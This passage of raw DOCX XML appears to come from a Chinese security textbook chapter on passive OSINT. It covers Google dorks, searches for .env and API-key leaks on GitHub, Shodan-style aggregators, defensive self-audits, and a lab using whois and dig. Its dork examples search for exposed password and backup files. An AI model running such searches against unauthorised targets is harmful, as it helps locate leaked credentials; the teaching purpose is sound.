        <w:t xml:space="preserve">搜索特定文件类型；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">intitle:"index of"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索目录列表；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">inurl:admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中包含特定关键词的页面。将语法组合使用，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt; filetype:xlsx "password"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt; inurl:"backup"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可能发现组织员工无意中上传到公网的内部文档、备份文件、配置文件。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎的索引能力是一个既有的公共基础设施特性；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体能否搜索到敏感文件完全取决于目标组织的安全意识水平和信息泄露管理能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cache（缓存）功能尤为危险：即使组织发现暴露后删除了文件，搜索引擎的缓存可能仍保存着内容的副本。攻击者可以通过查看缓存快照获取已删除文件的内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御层面，组织应定期使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google Dorking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术对自身域名进行自查（一种被动的暴露面审计），发现并清除不当暴露的文件。同时，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阻止搜索引擎索引敏感目录（但需注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身是公开的，攻击者也可以从中判断哪些目录是组织希望隐藏的），并配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器在响应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头中包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Robots-Tag: noindex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以获得更可靠的控制。蓝队应注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对攻击者的作用有限——它更像是一种礼貌约定，而非安全控制。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="公开代码仓库与配置泄露"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公开代码仓库与配置泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHub、GitLab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等公开代码仓库是组织信息泄露的重灾区。开发人员可能在提交代码时无意中将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥、数据库连接字符串、内部主机名、密码哈希甚至完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置文件推送到了公开仓库。攻击者可以通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GitHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的高级搜索语法（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">org:&lt;ORGANIZATION&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filename:.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、特定关键词）来发现这些泄露。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GitHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索是基于公开仓库索引的标准功能。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体泄露内容因组织的开发实践和安全管控而异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，Pastebin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类文本分享平台、Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Overflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等技术问答社区上的提问、以及组织员工个人博客中的配置片段，都可能成为信息来源。攻击者并不需要找到完整的密码——一个内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、一个内部系统名称、一段路径结构，都可能在后续攻击中被利用为信息跳板。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御要求组织建立代码推送前的自动扫描流水线，使用工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GitGuardian、truffleHog）检测代码中的敏感信息（Secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection），并推行安全编码规范，禁止将凭据硬编码到源代码中。对于已泄露的信息，应启动应急响应流程：轮换密钥、评估受影响范围、并联系平台移除泄露内容（即使如此，攻击者可能已保存副本）。蓝队应定期对组织的公开仓库进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自查，模拟攻击者视角发现泄露点。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="第三方数据聚合与关联"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第三方数据聚合与关联</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">除上述数据源外，攻击者还会利用多种第三方数据聚合服务进行资产关联。Shodan、Censys、ZoomEye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等网络空间搜索引擎持续扫描互联网，索引所有可访问设备及其开放端口、服务横幅信息。在被动侦察阶段，攻击者可以通过这些平台查询已知</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或域名来获取组织的暴露服务概况，而无需自行发起扫描。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，LinkedIn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等职业社交平台可提供组织员工信息、技术栈偏好（通过职位描述中的技能要求推断）；Job</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">招聘广告中有时会详细列出内部使用的技术体系和安全防护产品；Wayback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine（互联网档案馆）可以查看网站的历史版本，这些历史页面可能包含当前版本已删除的联系方式、内部链接甚至注释代码片段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">整体而言，OSINT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的本质是关联发散（Pivoting）：从域名到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到主机名，从主机名到联系人邮箱，从邮箱到代码仓库用户名，再从用户名关联到更多项目——每个信息节点都是下一个搜索的起点，直到构建出足够完整的攻击面地图。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="81" w:name="交叉回指框"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询机制、记录类型、解析路径的详细原理已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名系统与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由基础）中系统阐述。此处直接使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">知识进行被动侦察应用，不再重复讲授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A/AAAA/MX/NS/SOA/CNAME/TXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录的定义与功能。读者若对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议层次、递归解析与迭代查询的区别有疑问，请回顾该章内容。同样，TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接的基础（用于理解后续主动侦察的交互机制）已见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="靶机实操单元"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本单元的目标是通过实际命令操作，理解被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集的典型工作流。实验环境要求：已搭建隔离的虚拟化实验网络（见本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章），攻击机为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或等效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发行版，网络连接仅用于合法查询公共</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务，不直接触碰任何未授权目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一步：WHOIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期要点：返回域名注册商信息、注册日期、到期日期、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器列表。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际显示的字段取决于目标域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注册局政策和隐私保护设置。如果启用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隐私保护，注册人字段将显示注册商的代理信息。③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此查询仅为教学演示，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应为读者在授权范围内选择的实验域名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第二步：DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">记录查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查询 A 记录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @8.8.8.8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查询 MX 记录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查询 TXT 记录（含 SPF/DMARC）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> TXT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查询 NS 记录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期要点：能获取到域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、邮件服务器名称（及其优先级值）、SPF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
